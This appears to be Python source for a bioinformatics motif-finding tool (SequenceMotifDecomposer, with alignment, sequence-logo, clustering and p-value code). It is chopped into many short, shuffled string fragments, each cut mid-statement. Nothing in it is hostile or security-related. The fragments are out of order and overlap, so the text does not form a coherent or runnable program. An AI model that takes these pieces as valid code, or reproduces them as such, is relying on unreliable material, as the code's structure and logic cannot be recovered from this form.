"k = c.most_common() code = '' for i, row in enumerate(cluster.T): c =",
"a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a,",
"output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(),",
"== 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else:",
"os.getcwd() url = pwd + '/' + fname txt = [] if fill_width:",
"info2) # update motives motives[i] = motif del motives[j] success = True if",
"plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i,",
"dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed = [] for i,",
"/ b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\"",
"2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in haystack: for match",
"deleting: %d [%d is now #%d]' % \\ (j, i, n_i + n_j)",
"alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet =",
"options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width =",
"data): params = {'maxiters': 7} if self.diags is True: params['diags'] = True if",
"freq of occurrences of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st",
"args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs,",
"Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info",
"% len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for",
"else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5,",
"seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size,",
"half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\"",
"Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq",
"title: options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if",
"k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = []",
"- start val = sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod):",
"+ fname txt = [] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img",
"pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt",
"_compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for h, align_seq in",
"= 2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield",
"title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='',",
"self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x)",
"size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets =",
"= [''] * len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id]",
"yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack)",
"re from collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance",
"mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator))",
"data = handle.getvalue() return headers, data def _perform_ma(self, data): params = {'maxiters': 7}",
"= tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids",
"j from any instance in i d_ij = [] for c_i in centers[i]:",
"annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time()",
"scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs,",
"/ size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex =",
"fineprint self.options = options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo",
"# ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self,",
"\"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for",
"max(id for id in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id",
"logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning(",
"performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer,",
"# ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line",
"= list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]: id =",
"output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else:",
"['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True,",
"= motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring filter.')",
"s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0,",
"handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data def",
"else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format =",
"sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0",
"sigs is None: if len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig)",
"(time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds =",
"s): s = match.start() e = match.end() m = s + (e -",
"dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T):",
"(fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return",
"int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq",
"avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th",
"i) for i in motives], reverse=True): info = '#### Motif id: %d' %",
"in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for",
"score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size:",
"if not subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d",
"_order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity * 2) # join",
"\"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score)",
"in range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1):",
"info2 = ' deleting: %d [%d is now #%d]' % \\ (j, i,",
"None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for",
"\"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys)",
"c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex,",
"i in motives], reverse=True): info = '#### Motif id: %d' % cluster_id txt.append(info)",
"freq >= freq_th: if std_th is None or std <= std_th: _motives[cluster_id] =",
"= resolution if fineprint: options.fineprint = fineprint self.options = options self.output_format = output_format",
"scale_stack_widths options.show_errorbars = error_bars if title: options.title = title if figure_label: options.logo_label =",
"% (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val",
"in motives], reverse=True): info = ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq'])",
"+ '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width:",
"+ '/' + fname txt = [] if fill_width: if output_type == 'pdf':",
"args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() -",
"in enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i)",
"for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info =",
"+ info2) # update motives motives[i] = motif del motives[j] success = True",
"os from collections import defaultdict from eden import apply_async import numpy as np",
"s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig =",
"freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '####",
"for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1 if",
"serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time()",
"= np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position')",
"an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours = maxhours if alphabet",
"= time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get()",
"= max(id for id in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for",
"[] for i, row in enumerate(cooccurence_mtx): norm = row[i] if norm != 0:",
"c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in centers[i]:",
"cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm = row[i] if norm",
"subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for",
"orders = [] for id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs):",
"motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 =",
"= freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg",
"%.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = []",
"if is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time logger.debug( 'Cluster %d",
"% (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return motives",
"% e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1",
"min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool",
"K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single')",
"float(size) > regex_th: if letter != '-': code.append(letter) if len(code) == 0: code_str",
"serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' %",
"'\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in",
"norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives) txt.append(info)",
"= [id for id in motives] seqs_summary = defaultdict(list) for seq_id, begin, end,",
"def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename,",
"rel_nw_score, i, j in ms: if motives.get(i, None) and motives.get(j, None): n_i =",
"cluster = np.vstack(cluster) score = 0 to_be_removed = [] for i, row in",
"mismatch: %d != %d' % (len(sig), median_len)) if sigs is None: if len(sig)",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header):",
"time.time() scores = p.get() scores_items += scores d_time = time.time() - start_time d_loc_time",
"(seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids",
"if len(code) == 0: code_str = None elif len(code) == 1: code_str =",
"% (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None,",
"def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs)",
"= components p = self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end,",
"def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs: str_list",
"sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else:",
"secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def",
"plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname,",
"[] for id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if",
"ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative",
"url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"",
"src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p",
"sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig ==",
"for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing')",
"seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header,",
"estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except",
"sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list)",
"from eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt import joblib from",
"= multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size,",
"seq: yield seq seq = \"\" line_str = str(line) yield line_str.strip() else: line_str",
"% (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i,",
"= time.time() subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time() - start_time",
"select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters",
"+- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname",
"iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time()",
"% (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\"",
"else: avg_loc = -1 std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None):",
"size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100,",
"neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time =",
"wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format)",
"from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans",
"['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True,",
"'### Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size,",
"start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives",
"pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time",
"= [] for id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1))",
"all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt =",
"counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std",
"Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' %",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try:",
"min_freq: score += 1 trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq",
"style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url +",
"serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process,",
"metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt import joblib",
"in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds,",
"update motives motives[i] = motif del motives[j] success = True if success is",
"= multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in",
"self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except Exception as e:",
"neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix =",
"min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d",
"size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to",
"st = motives[cluster_id]['std_pos'] info = ' - average location: %.1f +- %.1f' %",
"[] info = ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info =",
"= [] for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j))",
"p.get() scores_items += scores d_time = time.time() - start_time d_loc_time = time.time() -",
"max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq,",
"return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores =",
"vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool",
"% (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\"",
"self.maxiters = maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein",
"'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating",
"info = ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = '",
"secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds)",
"motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg,",
"cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s'",
"selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size",
"cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids = set(cluster_ids)",
"(%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives))",
"len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring filter.') return motives else:",
"start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s",
"min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except Exception",
"enumerate(cluster.T): c = Counter(row) k = c.most_common() seq += k[0][0] return seq def",
"figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts']",
"secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = []",
"neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary)",
"seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10,",
"in ms: if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j =",
"header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end = int(end) subseq =",
"= time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix",
"selected_abs = min(d_ij) for c_i in centers[i]: for c_j in centers[j]: if selected_abs",
"= mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer,",
"score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time",
"in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except",
"- half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]:",
"imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd +",
"url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt)",
"= IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x) for",
"- %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'],",
"class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(),",
"vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in annotated_seqs] return scores def",
"freq_th: if std_th is None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if",
"serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable",
"TODO: run the predictor to learn the new class definition logger.debug('After merge, %d",
"self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size",
"np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time",
"params = {'maxiters': 7} if self.diags is True: params['diags'] = True if self.maxhours",
"h, align_seq in align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq) if",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items =",
"the new class definition logger.debug('After merge, %d motives' % len(motives)) return motives def",
"annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = []",
"x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval",
"= len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif =",
"required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an",
"% data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds",
"in enumerate(cluster.T): c = Counter(row) k = c.most_common() code = '' for i,",
"items = [] for i in range(n): it = iterable.next() items.append(it) yield items",
"def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th)",
"else: logger.warning( 'No logo to compute. Try more permissive parameters.') def _save_logo(self, logo,",
"enumerate(results): loc_start_time = time.time() scores = p.get() scores_items += scores d_time = time.time()",
"len(sig) >= median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs))",
"python \"\"\"SequenceMotifDecomposer is a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import",
"None for scores in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length",
"= \"\" for line in lines: if line: if line[0] == '>': if",
"occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs)",
"perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check",
"is None: ids = [id for id in motives] seqs_summary = defaultdict(list) for",
"seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet =",
"true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10):",
"results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in",
"logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed",
"= True if success is False: break # TODO: run the predictor to",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try:",
"start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for i, p in enumerate(results):",
"class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self,",
"row in enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row /= norm",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self,",
"%s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix",
"sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO",
"self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr =",
